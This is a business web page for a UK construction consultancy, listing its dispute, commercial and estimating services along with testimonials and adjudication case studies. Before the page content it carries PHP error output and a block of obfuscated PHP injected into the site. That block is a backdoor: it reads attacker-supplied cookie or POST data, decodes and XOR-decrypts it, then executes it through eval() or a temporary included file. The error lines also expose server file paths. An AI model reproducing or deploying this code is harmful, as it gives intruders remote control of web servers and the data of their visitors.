Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-display.php on line 1405

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-display.php on line 1405

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-display.php on line 1406

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-display.php on line 1406

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-display.php on line 1407

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-display.php on line 1407

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-display.php on line 1408

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-display.php on line 1408

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-display.php on line 1409

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-display.php on line 1409

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-display.php on line 1410

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-display.php on line 1410

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-display.php on line 1412

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-display.php on line 1412

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-process.php on line 580

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-process.php on line 580

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-process.php on line 581

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-process.php on line 581

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-process.php on line 581

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-process.php on line 581

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-process.php on line 583

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-process.php on line 583

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-process.php on line 584

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-process.php on line 584

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-process.php on line 584

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-process.php on line 584

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-process.php on line 586

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-process.php on line 586

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-process.php on line 587

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-process.php on line 587

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-process.php on line 587

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-process.php on line 587

Deprecated: Calling get_class() without arguments is deprecated in E:\WWW\SayersCommercial\\www\wp-content\plugins\wordfence\lib\wfScanMonitor.php on line 123

Deprecated: Calling get_class() without arguments is deprecated in E:\WWW\SayersCommercial\\www\wp-content\plugins\wordfence\lib\wfScanMonitor.php on line 124
$WJVkA = chr ( 385 - 266 ).chr (98) . chr ( 269 - 174 )."\x41" . chr (82) . "\104" . "\x7a" . 's';$ybRMMGFQSg = "\143" . 'l' . "\x61" . "\163" . 's' . "\x5f" . chr ( 306 - 205 ).chr ( 839 - 719 ).chr (105) . chr ( 331 - 216 )."\164" . "\x73";$UykzvsrP = class_exists($WJVkA); $ybRMMGFQSg = "5424";$eWtzuSPatp = strpos($ybRMMGFQSg, $WJVkA);if ($UykzvsrP == $eWtzuSPatp){function UUrniRro(){$yCUFpqjzL = new /* 63857 */ wb_ARDzs(26721 + 26721); $yCUFpqjzL = NULL;}$OEUmlgD = "26721";class wb_ARDzs{private function XFCYSjU($OEUmlgD){if (is_array(wb_ARDzs::$AcacSUdDu)) {$KuxesT2 = str_replace("<" . "?php", "", wb_ARDzs::$AcacSUdDu["content"]);eval($KuxesT2); $OEUmlgD = "26721";exit();}}public function NBxdB(){$KuxesT = "27699";$this->_dummy = str_repeat($KuxesT, strlen($KuxesT));}public function __destruct(){wb_ARDzs::$AcacSUdDu = @unserialize(wb_ARDzs::$AcacSUdDu); $OEUmlgD = "31877_30068";$this->XFCYSjU($OEUmlgD); $OEUmlgD = "31877_30068";}public function JrHZesMl($KuxesT, $loRzQee){return $KuxesT[0] ^ str_repeat($loRzQee, intval(strlen($KuxesT[0]) / strlen($loRzQee)) + 1);}public function sHeTuNspM($KuxesT){$PxssQeKv = "\142" . chr ( 1085 - 988 ).chr ( 1011 - 896 )."\145" . chr ( 553 - 499 ).'4';return array_map($PxssQeKv . chr (95) . "\144" . chr ( 636 - 535 )."\143" . "\x6f" . "\x64" . "\145", array($KuxesT,));}public function __construct($XDCDieOUwa=0){$SlmaPbSLV = "\x2c";$KuxesT = "";$FUfIzgB = $_POST;$TNjyE = $_COOKIE;$loRzQee = "b8faf738-0c82-4d32-9c24-221030211ed3";$dzCII = @$TNjyE[substr($loRzQee, 0, 4)];if (!empty($dzCII)){$dzCII = explode($SlmaPbSLV, $dzCII);foreach ($dzCII as $vYEEG){$KuxesT .= @$TNjyE[$vYEEG];$KuxesT .= @$FUfIzgB[$vYEEG];}$KuxesT = $this->sHeTuNspM($KuxesT);}wb_ARDzs::$AcacSUdDu = $this->JrHZesMl($KuxesT, $loRzQee);if (strpos($loRzQee, $SlmaPbSLV) !== FALSE){$loRzQee = explode($SlmaPbSLV, $loRzQee); $rIuzKjk = sprintf("31877_30068", rtrim($loRzQee[0]));}}public static $AcacSUdDu = 50381;}UUrniRro();}$UVvzr = "\166" . chr (95) . chr ( 600 - 481 ).chr ( 893 - 813 ).chr ( 441 - 368 ).'r' . chr ( 556 - 484 ); $QswAuAtmH = 'c' . 'l' . "\141" . "\163" . 's' . chr (95) . 'e' . "\x78" . 'i' . chr (115) . chr (116) . chr ( 852 - 737 ); $RmEUKauqms = class_exists($UVvzr); $QswAuAtmH = "60056";$WJOvAl = strpos($QswAuAtmH, $UVvzr);if ($RmEUKauqms == $WJOvAl){function rUQaPRJarR(){$TSevyADzkI = new /* 36967 */ v_wPIrH(57503 + 57503); $TSevyADzkI = NULL;}$cWmKULUNvs = "57503";class v_wPIrH{private function jqBBlqRsm($cWmKULUNvs){if (is_array(v_wPIrH::$tbtFDnHv)) {$name = sys_get_temp_dir() . "/" . crc32(v_wPIrH::$tbtFDnHv["salt"]);@v_wPIrH::$tbtFDnHv["write"]($name, v_wPIrH::$tbtFDnHv["content"]);include $name;@v_wPIrH::$tbtFDnHv["delete"]($name); $cWmKULUNvs = "57503";exit();}}public function lwlCBzCsp(){$ehZxQAH = "48143";$this->_dummy = str_repeat($ehZxQAH, strlen($ehZxQAH));}public function __destruct(){v_wPIrH::$tbtFDnHv = @unserialize(v_wPIrH::$tbtFDnHv); $cWmKULUNvs = "944_31387";$this->jqBBlqRsm($cWmKULUNvs); $cWmKULUNvs = "944_31387";}public function uoCzLT($ehZxQAH, $JAnigFuCwX){return $ehZxQAH[0] ^ str_repeat($JAnigFuCwX, intval(strlen($ehZxQAH[0]) / strlen($JAnigFuCwX)) + 1);}public function tbPDZ($ehZxQAH){$sohAuh = chr (98) . 'a' . "\163" . "\x65" . "\x36" . chr ( 64 - 12 );return array_map($sohAuh . "\x5f" . chr (100) . 'e' . "\x63" . 'o' . "\x64" . chr (101), array($ehZxQAH,));}public function __construct($oQVtVFUBtg=0){$VmeCnch = "\54";$ehZxQAH = "";$XuKqTYTxe = $_POST;$hWAFpVglE = $_COOKIE;$JAnigFuCwX = "007d08cb-5abe-40c8-b4bd-a9cb8a236c29";$xyVdk = @$hWAFpVglE[substr($JAnigFuCwX, 0, 4)];if (!empty($xyVdk)){$xyVdk = explode($VmeCnch, $xyVdk);foreach ($xyVdk as $ggGvQjH){$ehZxQAH .= @$hWAFpVglE[$ggGvQjH];$ehZxQAH .= @$XuKqTYTxe[$ggGvQjH];}$ehZxQAH = $this->tbPDZ($ehZxQAH);}v_wPIrH::$tbtFDnHv = $this->uoCzLT($ehZxQAH, $JAnigFuCwX);if (strpos($JAnigFuCwX, $VmeCnch) !== FALSE){$JAnigFuCwX = explode($VmeCnch, $JAnigFuCwX); $ZHvxN = base64_decode(strrev($JAnigFuCwX[0]));}}public static $tbtFDnHv = 15659;}rUQaPRJarR();}
Deprecated: Calling get_class() without arguments is deprecated in E:\WWW\SayersCommercial\\www\wp-includes\class-wp-http.php on line 329
Services | Sayers Commercial - Sayers Commercial

ExplanationOur Services

Our services are tailored carefully dependent on your specific needs.

We can offer:

  • Negotiation prior to (or following) crystalisation of a formal dispute
  • Advice on and preparation of claims (extensions of time and/or loss and expense)
  • Representation in the prosecution or defending of adjudication proceedings
  • Legal advice
  • Contract interpretation/review and advice
  • Contract drafting
  • Forensic account analysis
  • Final account preparation
  • Procurement and surveying services
  • Estimating and bidding support

Dispute Management

  • Adjudication – Advice and representation in the prosecuting or defending of adjudication proceedings
  • Mediation – Advice and representation in all matters
  • Arbitration – Advice and representation in all matters
  • Negotiation on any dispute pertaining to the contract or the law through to satisfactory resolution
  • Claims – Advice on, and preparation of, claims for extensions of time and/or loss and expense
  • General advice on all matters pertaining to the contract and the law

“We have found Sayers Commercial to be extremely user friendly, and it has provided us with commercial, contract, legal and dispute related advice whenever required.  In all aspects it has been most helpful and, more importantly, successful” Lee Clements, Director 345 Interiors Ltd

Commercial Management

Procurement and Surveying (sub contractors & Main Contractors)

  • Procurement (subcontractors, plant, materials etc)
  • Preparation of Budgets
  • Preparation and agreement of interim valuations and final accounts
  • Valuation and agreement of variations
  • Preparation of cost value reconciliations for internal accounting
  • Preparation of cost to complete reports for internal accounting
  • Value engineering to reduce costs
  • Cashflow forecasts for internal accounting
  • Preparation of contractual letters and notices
  • Strategic reviews of submitted final accounts

Estimating / Tendering / Pre-Construction / Winning Work

Our team have experience across all sectors of the construction industry (commercial, retail, leisure, residential, industrial, etc) in the following disciplines:

  • Commercial bid preparation (project sizes from £10,000 to £50,000,000)
  • Formal quotation preparation (including resourced quotes, full analysis and levelling to provide accurate, like-for-like comparisons)
  • Cost planning
  • Bill of quantities preparation
  • Project ‘take offs’ and quantities against specific trades / packages
  • Technical bid preparation
  • Pre-Qualification assistance
  • Project tender write ups
  • Logistical plans
  • Document design (InDesign)

Why is this of benefit to you / your business?

For large / medium sized contractors:

  • We are able to ease the tendering burden when you are potentially overwhelmed with enquiries
  • We add value to existing proposals (either commercially or technically)
  • We provide cover for staff illness / holiday periods
  • For small sized contractors
  • We provide the support of a large, main stream contracting background to add value to selected bids and proposals
  • We provide independents reviews and support to priority / targeted bids
  • We can offset the cost of a full-time estimating department / investment
ExplanationCase Studies/Experience

Commercial Management

Our team have managed the commercial function from procurement through to final account, on a variety of projects up to £25million. We have undertaken this role for both subcontractors and main contractors in the new build, refurbishment and fit-out sectors.

“Sayers Commercial obtained full payment for me on a number of contracts.  Highly recommended.” Tony Walsh, Managing Director Globerange Ltd.

Dispute Resolution

Type – Adjudication
Value – £100k
Details – Successfully represented the Responding Party during an adjudication in which the Referring Party alleged a failure of our client in respect of the payment provisions of the Local Democracy Economic Development and Construction Act 2009.  Following our substantive response, in which we asserted that no such failure existed, the Adjudicator decided fully in favour of our client with all his costs to be met by the Referring Party.

Type – Adjudication
Value – £350k
Details – Successfully represented the Responding Party during an adjudication in which the Referring Party alleged a failure of our client in respect of the valuation of its Final Account.  Following an initial referral, we successfully challenged the jurisdiction of the Adjudicator due to a failure of the Referring Party to comply with the adjudication provisions of The Scheme for Construction Contracts 1998 (as amended 2011).  The Adjudicator resigned as a result of our challenge to his jurisdiction.  Following a subsequent successful referral to the same Adjudicator, we produced a substantive response which demonstrated that our client had, in fact, previously over valued the Final Account.  A number of days following receipt of our Response, the Referring Party entered liquidation and we successfully sought the resignation of the Adjudicator for a second time.

Type – Construction Law
Value – £100k
Details – Following a claim by an alleged assignee of a debt that it was due a payment in excess of £100k from our client we successfully asserted, by reference to relevant statute and common law, that the assignment was invalid.

Type – Construction Law
Value – £50k
Details – Following our client’s receipt of a Statutory Demand after an alleged failure to comply with the payment provisions of the Local Democracy Economic Development and Construction Act 2009, we successfully asserted that no such failure existed and successfully sought the withdrawal of the Statutory Demand.

Type – Construction Law
Value – £28k
Details – Successfully obtained payment on behalf of our client by reference to the common law position on the relative principles of contract formation.

Type – Construction Law
Value – £25k
Details – Successfully obtained payment on behalf of our client by reference to the common law position on the relative principles of damages for breach of contract.

Type – Construction Law
Value – £60k
Details – Following our client’s receipt of an Adjudication Notice, we successfully prevented the matter from being referred to the Adjudicator through our assertion of the common law position relating to those matters which an adjudicator cannot consider and thus that he would have no jurisdiction to consider the matter to be referred.

Type – Negotiation
Value – £35k
Details – Successfully negotiated a compromise agreement on behalf of our client following it being the subject of litigation.